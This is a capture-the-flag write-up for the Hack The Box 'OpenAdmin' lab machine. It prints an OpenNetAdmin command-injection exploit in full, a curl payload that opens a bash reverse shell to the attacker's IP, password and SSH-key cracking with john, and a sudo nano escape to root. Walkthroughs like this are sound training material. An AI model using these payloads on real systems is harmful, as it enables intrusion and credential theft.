--- search: exclude: true --- # OpenAdmin Writeup ![](img/41.png) ## Introduction : OpenAdmin is an easy Linux box released back in january 2020. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.0.14.13/16 ] [ /dev/pts/1 ] [~/HTB] → nmap -sCV 10.10.10.171 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 21:20 CEST Nmap scan report for 10.10.10.171 Host is up (0.039s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds ## **Part 2 : Getting User Access** For this box we're going to enumerate port 80 using a directory enumeration tool written in go called ffuf with one of the wordlists from seclists: [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/OpenAdmin] → apt install seclists ffuf [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive ________________________________________________ :: Method : GET :: URL : http://10.10.10.171/FUZZ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt :: Output file : ffuf.txt :: File format : json :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401 ________________________________________________ artwork [Status: 301, Size: 314, Words: 20, Lines: 10] index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376] music [Status: 301, Size: 312, Words: 20, Lines: 10] :: Progress: [4681/4681] :: Job [1/1] :: 978 req/sec :: Duration: [0:00:07] :: Errors: 0 :: Now from here we can scrape the results that got outputted in ffuf.txt using a python script: [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → cat ffuf.txt {"commandline":"ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt","time":"2021-05-27T07:01:23+02:00","results":[{"input":{"FUZZ":"artwork"},"position":695,"status":301,"length":314,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://10.10.10.171/artwork/","resultfile":"","url":"http://10.10.10.171/artwork","host":"10.10.10.171"},{"input":{"FUZZ":"index.html"},"position":2176,"status":200,"length":10918,"words":3499,"lines":376,"content-type":"text/html","redirectlocation":"","resultfile":"","url":"http://10.10.10.171/index.md","host":"10.10.10.171"},{"input":{"FUZZ":"music"},"position":2747,"status":301,"length":312,"words":20,"lines":10,"content-type":"text/html; charset=iso-8859-1","redirectlocation":"http://10.10.10.171/music/","resultfile":"","url":"http://10.10.10.171/music","host":"10.10.10.171"}],"config":{"autocalibration":false,"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -u http://10.10.10.171/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -o ffuf.txt","configfile":"","postdata":"","delay":{"value":"0.00"},"dirsearch_compatibility":false,"extensions":[],"filters":{},"follow_redirects":false,"headers":{},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/seclists/Discovery/Web-Content/common.txt"}],"inputshell":"","matchers":{"status":{"value":"200,204,301,302,307,401"}},"maxtime":0,"maxtime_job":0,"method":"GET","noninteractive":false,"outputdirectory":"","outputfile":"ffuf.txt","outputformat":"json","OutputCreateEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://10.10.10.171/FUZZ","verbose":false}}% [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → vim scraper.py #!/usr/bin/python import sys import json import requests import argparse from bs4 import BeautifulSoup def results(file): content=open(file,'r').readlines() for line in content: data=json.loads(line.strip()) urls=[] for url in data['results']: urls.append(url['url']) return urls def crawl(url): r = requests.get(url) soup = BeautifulSoup(r.text,'lxml') links = soup.findAll('a',href=True) for link in links: link=link['href'] if link and link!='#': print('[+] {} : {} '.format(url,link)) if __name__ == '__main__' : parser =argparse.ArgumentParser() parser.add_argument("file",help="ffuf results") args = parser.parse_args() urls=results(args.file) for url in urls: crawl(url) Now execute it and see the result: [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin] → python3 scraper.py usage: scraper.py [-h] file scraper.py: error: the following arguments are required: file [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin] → python3 scraper.py ffuf.txt [+] http://10.10.10.171/artwork : index.html [+] http://10.10.10.171/artwork : index.html [+] http://10.10.10.171/artwork : about.html [+] http://10.10.10.171/artwork : services.html [+] http://10.10.10.171/artwork : blog.html [+] http://10.10.10.171/artwork : contact.html [+] http://10.10.10.171/artwork : single.html [+] http://10.10.10.171/artwork : single.html [+] http://10.10.10.171/artwork : single.html [+] http://10.10.10.171/artwork : single.html [+] http://10.10.10.171/artwork : single.html [+] http://10.10.10.171/artwork : single.html [+] http://10.10.10.171/artwork : index.html [+] http://10.10.10.171/artwork : https://colorlib.com [+] http://10.10.10.171/index.md : /manual [+] http://10.10.10.171/index.md : http://httpd.apache.org/docs/2.4/mod/mod_userdir.html [+] http://10.10.10.171/index.md : https://bugs.launchpad.net/ubuntu/+source/apache2 [+] http://10.10.10.171/music : index.html [+] http://10.10.10.171/music : ../ona [+] http://10.10.10.171/music : index.html [+] http://10.10.10.171/music : category.html [+] http://10.10.10.171/music : playlist.html [+] http://10.10.10.171/music : artist.html [+] http://10.10.10.171/music : blog.html [+] http://10.10.10.171/music : contact.html [+] http://10.10.10.171/music : blog.html [+] http://10.10.10.171/music : contact.html [+] http://10.10.10.171/music : https://colorlib.com And so with this we find the ../ona path ![](prg/41_001.png) ona in this case refers to OpenNetAdmin, and we know that it is version 18.1.1, so let's see if there are any CVEs for this service: [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin] → searchsploit opennetadmin ------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------ --------------------------------- OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)| php/webapps/47772.rb OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh ------------------------------------------------------------ --------------------------------- Shellcodes: No Results And here you see that we have a few exploits to work with. We're going to take a look at the RCE one: [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin] → cp $(locate 47691.sh) . [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin] → ls 47691.sh ffuf.txt scraper.py [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin] → vim 47691.sh #!/bin/bash URL="${1}" while true;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr;=1574117726710&xajaxargs;[]=tooltips&xajaxargs;[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs;[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1 done Very simplistic exploit, it just needs the URL of the ona instance of the machine: [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → dos2unix 47691.sh dos2unix: converting file 47691.sh to Unix format... [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → ./47691.sh http://10.10.10.171/ona/ $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ ls -lash total 72K 4.0K drwxrwxr-x 10 www-data www-data 4.0K Nov 22 2019 . 4.0K drwxr-x--- 7 www-data www-data 4.0K Nov 21 2019 .. 4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 .htaccess.example 4.0K drwxrwxr-x 2 www-data www-data 4.0K Jan 3 2018 config 4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 config_dnld.php 8.0K -rw-rw-r-- 1 www-data www-data 4.1K Jan 3 2018 dcm.php 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 images 4.0K drwxrwxr-x 9 www-data www-data 4.0K Jan 3 2018 include 4.0K -rw-rw-r-- 1 www-data www-data 2.0K Jan 3 2018 index.php 4.0K drwxrwxr-x 5 www-data www-data 4.0K Jan 3 2018 local 8.0K -rw-rw-r-- 1 www-data www-data 4.5K Jan 3 2018 login.php 4.0K -rw-rw-r-- 1 www-data www-data 1.1K Jan 3 2018 logout.php 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 modules 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 plugins 4.0K drwxrwxr-x 2 www-data www-data 4.0K Jan 3 2018 winc 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jan 3 2018 workspace_plugins And there we have command execution as www-data! However the more we test this, the more we see that we are very limited with our shell (unable to access python3, bash and such) so let's manually push a bash shell: [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/OpenAdmin] → curl -s -d "xajax=window_submit&xajaxr;=1574117726710&xajaxargs;[]=tooltips&xajaxargs;[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.13/4443 0>%261'&xajaxargs;[]=ping" http://10.10.10.171/ona/ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → nc -lvnp 4443 listening on [any] 4443 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.171] 43106 bash: cannot set terminal process group (1077): Inappropriate ioctl for device bash: no job control in this shell www-data@openadmin:/opt/ona/www$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) Now let's upgrade our shell to a fully interactive TTY: www-data@openadmin:/opt/ona/www$ which python python3 which python python3 /usr/bin/python3 www-data@openadmin:/opt/ona/www$ python3 -c 'import pty;pty.spawn("/bin/bash")' $ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@openadmin:/opt/ona/www$ ^Z [1] + 3470018 suspended nc -lvnp 4443 [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → stty raw -echo ; fg [1] + 3470018 continued nc -lvnp 4443 www-data@openadmin:/opt/ona/www$ export TERM=screen-256color www-data@openadmin:/opt/ona/www$ export SHELL=bash www-data@openadmin:/opt/ona/www$ stty rows 40 columns 125 www-data@openadmin:/opt/ona/www$ reset Let's see which users we can privesc to: www-data@openadmin:/opt/ona/www$ cat /etc/passwd | grep bash root:x:0:0:root:/root:/bin/bash jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash joanna:x:1001:1001:,,,:/home/joanna:/bin/bash www-data@openadmin:/opt/ona/www$ ls -lashR /home /home: total 16K 4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 . 4.0K drwxr-xr-x 24 root root 4.0K Nov 21 2019 .. 4.0K drwxr-x--- 5 jimmy jimmy 4.0K Nov 22 2019 jimmy 4.0K drwxr-x--- 6 joanna joanna 4.0K Nov 28 2019 joanna ls: cannot open directory '/home/jimmy': Permission denied ls: cannot open directory '/home/joanna': Permission denied To enumerate this box automatically we can use linpeas.sh: [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → locate linpeas.sh /home/nothing/HTB/Postman/linpeas.sh /home/nothing/HTB/Traverxec/linpeas.sh /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh . [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... www-data@openadmin:/opt/ona/www$ which wget curl /usr/bin/wget /usr/bin/curl www-data@openadmin:/opt/ona/www$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh --2021-05-27 06:39:01-- http://10.10.14.13:9090/linpeas.sh Connecting to 10.10.14.13:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 341863 (334K) [text/x-sh] Saving to: '/tmp/peas.sh' /tmp/peas.sh 100%[====================================================>] 333.85K 695KB/s in 0.5s 2021-05-27 06:39:02 (695 KB/s) - '/tmp/peas.sh' saved [341863/341863] www-data@openadmin:/opt/ona/www$ chmod +x /tmp/peas.sh www-data@openadmin:/opt/ona/www$ /tmp/peas.sh ` ![](prg/41_002.png) Linpeas gives alot of output, one thing that stands out is the following: ![](prg/41_003.png) OpenNetAdmin has a database settings php file in **/var/www/html/ona/local/config/database_settings.inc.php** www-data@openadmin:/opt/ona/www$ cd /var/www/html/ona/local/config www-data@openadmin:/var/www/html/ona/local/config$ ls -lash total 16K 4.0K drwxrwxr-x 2 www-data www-data 4.0K Nov 21 2019 . 4.0K drwxrwxr-x 5 www-data www-data 4.0K Jan 3 2018 .. 4.0K -rw-r--r-- 1 www-data www-data 426 Nov 21 2019 database_settings.inc.php 4.0K -rw-rw-r-- 1 www-data www-data 1.2K Jan 3 2018 motd.txt.example 0 -rw-r--r-- 1 www-data www-data 0 Nov 21 2019 run_installer www-data@openadmin:/var/www/html/ona/local/config$ vim database_settings.inc.php And here we see some hardcoded credentials: <****?php $ona_contexts=array ( 'DEFAULT' => array ( 'databases' => array ( 0 => array ( 'db_type' => 'mysqli', 'db_host' => 'localhost', 'db_login' => 'ona_sys', 'db_passwd' => 'n1nj4W4rri0R!', 'db_database' => 'ona_default', 'db_debug' => false, ), ), 'description' => 'Default data context', 'context_color' => '#D3DBFF', ), ); ?****> And as it turns out, those were jimmy's credentials! [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/OpenAdmin] → ssh jimmy@10.10.10.171 The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established. ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.171' (ECDSA) to the list of known hosts. jimmy@10.10.10.171's password: Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu May 27 07:04:20 UTC 2021 System load: 0.0 Processes: 121 Usage of /: 49.3% of 7.81GB Users logged in: 0 Memory usage: 29% IP address for ens160: 10.10.10.171 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 41 packages can be updated. 12 updates are security updates. Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3 jimmy@openadmin:~$ id uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal) jimmy@openadmin:~$ ls jimmy@openadmin:~$ ls -lash total 32K 4.0K drwxr-x--- 5 jimmy jimmy 4.0K Nov 22 2019 . 4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 .. 0 lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 2019 .bash_history -> /dev/null 4.0K -rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout 4.0K -rw-r--r-- 1 jimmy jimmy 3.7K Apr 4 2018 .bashrc 4.0K drwx------ 2 jimmy jimmy 4.0K Nov 21 2019 .cache 4.0K drwx------ 3 jimmy jimmy 4.0K Nov 21 2019 .gnupg 4.0K drwxrwxr-x 3 jimmy jimmy 4.0K Nov 22 2019 .local 4.0K -rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile So now we can access the **/var/www/internal** directory: jimmy@openadmin:/var/www/internal$ ls -lash total 20K 4.0K drwxrwx--- 2 jimmy internal 4.0K Nov 23 2019 . 4.0K drwxr-xr-x 4 root root 4.0K Nov 22 2019 .. 4.0K -rwxrwxr-x 1 jimmy internal 3.2K Nov 22 2019 index.php 4.0K -rwxrwxr-x 1 jimmy internal 185 Nov 23 2019 logout.php 4.0K -rwxrwxr-x 1 jimmy internal 339 Nov 23 2019 main.php jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/ internal.conf openadmin.conf jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/internal.conf Listen 127.0.0.1:52846 ServerName internal.openadmin.htb DocumentRoot /var/www/internal AssignUserID joanna joanna ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined The /var/www/internal/ directory is being used by the apache2 site whose configuration is at /etc/apache2/sites-enabled/internal.conf And it seems to be running on the machine's localhost port **52846** , No need to view the page itself because we have access to it's php sourcecode: jimmy@openadmin:/var/www/internal$ cat index.php | grep password .form-signin input[type="password"] { if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) { if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') { $msg = 'Wrong username or password.'; So here we get a hashed password, so let's crack it with john: [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → cat pass.hashed.txt 00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1 [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → hash-identifier ######################################################################### # __ __ __ ______ _____ # # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 # # By Zion3R # # www.Blackploit.com # # Root@Blackploit.com # ######################################################################### -------------------------------------------------- HASH: 00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1 Possible Hashs: [+] SHA-512 [+] Whirlpool Least Possible Hashs: [+] SHA-512(HMAC) [+] Whirlpool(HMAC) -------------------------------------------------- We get hinted that this is a SHA512 hash, so let's crack it using john and rockyou.txt [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → john pass.hashed.txt --format=Raw-SHA512 --wordlist=/usr/share/wordlists/rockyou.txt --rules=Jumbo Using default input encoding: UTF-8 Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x]) Warning: poor OpenMP scalability for this hash type, consider --fork=4 Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Revealed (?) 1g 0:00:00:02 DONE (2021-05-27 09:06) 0.4504g/s 6963Kp/s 6963Kc/s 6963KC/s Rey428..Reesenme Use the "--show" option to display all of the cracked passwords reliably Session completed And we get the password 'Revealed'! So let's create a ssh tunnel to the box to view the internal website: [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/OpenAdmin] → ssh jimmy@10.10.10.171 jimmy@10.10.10.171's password: n1nj4W4rri0R! Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu May 27 08:16:54 UTC 2021 System load: 0.0 Processes: 118 Usage of /: 49.3% of 7.81GB Users logged in: 1 Memory usage: 29% IP address for ens160: 10.10.10.171 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 41 packages can be updated. 12 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu May 27 07:04:21 2021 from 10.10.14.13 jimmy@openadmin:~$ Here you could create a SSH tunnel to get to the internal website like so: jimmy@openadmin:~$ ssh -R 1337:127.0.0.1:52946 root@10.10.14.13 However there's a simpler method: jimmy@openadmin:/var/www/internal$ curl localhost:52846/main.php -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8 ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE 6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI 9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4 piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/ /U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH 40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb 9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80 X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr 1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2 XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79 yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM +4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN -----END RSA PRIVATE KEY----- ### Don't forget your "ninja" password Click here to logout Session >> logout.php And we have an encrypted ssh key! so let's crack it: [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin] → vim id_rsa [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin] → file id_rsa id_rsa: PEM RSA private key [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin] → locate ssh2john /usr/share/john/ssh2john.py [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin] → /usr/share/john/ssh2john.py id_rsa > id_rsa.hash [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin] → john id_rsa.hash -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status bloodninjas (id_rsa) Warning: Only 2 candidates left, minimum 4 needed for performance. 1g 0:00:00:02 DONE (2021-05-27 10:16) 0.3496g/s 5014Kp/s 5014Kc/s 5014KC/sa6_123..*7¡Vamos! Session completed [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin] → chmod 600 id_rsa [ 10.10.14.13/23 ] [ /dev/pts/16 ] [~/HTB/OpenAdmin] → ssh joanna@10.10.10.171 -i id_rsa Enter passphrase for key 'id_rsa': Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu May 27 08:24:40 UTC 2021 System load: 0.0 Processes: 123 Usage of /: 49.6% of 7.81GB Users logged in: 1 Memory usage: 29% IP address for ens160: 10.10.10.171 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 41 packages can be updated. 12 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu Jan 2 21:12:40 2020 from 10.10.14.3 joanna@openadmin:~$ id uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal) joanna@openadmin:~$ ls user.txt joanna@openadmin:~$ cat user.txt c9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get the user flag. ## **Part 3 : Getting Root Access** Now in order to privesc to the root user, we run linpeas again: [ 10.10.14.13/23 ] [ /dev/pts/12 ] [~/HTB/OpenAdmin] → ls -lash linpeas.sh 336K -rwxr-xr-x 1 nothing nothing 334K May 27 08:13 linpeas.sh [ 10.10.14.13/23 ] [ /dev/pts/12 ] [~/HTB/OpenAdmin] → python3 -m http.server 9090 joanna@openadmin:~$ wget http://10.10.14.13:9090/linpeas.sh --2021-05-27 08:26:50-- http://10.10.14.13:9090/linpeas.sh Connecting to 10.10.14.13:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 341863 (334K) [text/x-sh] Saving to: ‘linpeas.sh’ linpeas.sh 100%[====================================================================================================================================================>] 333.85K 696KB/s in 0.5s 2021-05-27 08:26:50 (696 KB/s) - ‘linpeas.sh’ saved [341863/341863] joanna@openadmin:~$ chmod +x linpeas.sh joanna@openadmin:~$ ./linpeas.sh ` ![](prg/41_004.png) And here we see that joanna can run nano as the root user: joanna@openadmin:~$ sudo -l Matching Defaults entries for joanna on openadmin: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User joanna may run the following commands on openadmin: (ALL) NOPASSWD: /bin/nano /opt/priv Nano allows inserting external files into the current one using the shortcut CTRL+R, so let's do it: joanna@openadmin:~$ sudo -u root /bin/nano /opt/priv ^R ` ![](prg/41_005.png) Here we see that we can execute a command using CTRL+X, so we're going to get a shell using the following: ![](prg/41_006.png) The shell gets a bit weird once you do it but it effectively spawns a root shell as intended: ![](prg/41_007.png) Command to execute: reset; sh 1>&0 2>&0# id uid=0(root) gid=0(root) groups=0(root) ^X Read File # cat /root/root.txt M-F New Buffer 2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get a root shell and print the root flag. ## **Conclusion** Here we can see the progress graph : ![](img/41_graph.png)